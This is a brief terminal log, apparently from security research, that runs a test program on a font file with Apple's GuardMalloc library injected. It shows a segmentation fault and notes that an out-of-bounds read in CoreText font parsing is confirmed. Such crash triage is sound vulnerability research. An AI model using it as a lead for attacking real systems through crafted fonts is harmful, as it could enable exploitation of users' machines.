$ DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib ./main myfont.dfont
GuardMalloc[main-13531]: Allocations will be placed on 16 byte boundaries.
GuardMalloc[main-13531]:  - Some buffer overruns may not be noticed.
GuardMalloc[main-13531]:  - Applications using vector instructions (e.g., SSE) should work.
GuardMalloc[main-13531]: version 064535.38
2021-09-14 03:09:28.391 main[13531:102250] myfont.dfont -- file:///Users/daniellimws/coretext/
[1]    13531 segmentation fault  DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib ./main myfont.dfont

With libgmalloc, the OOB read can be confirmed.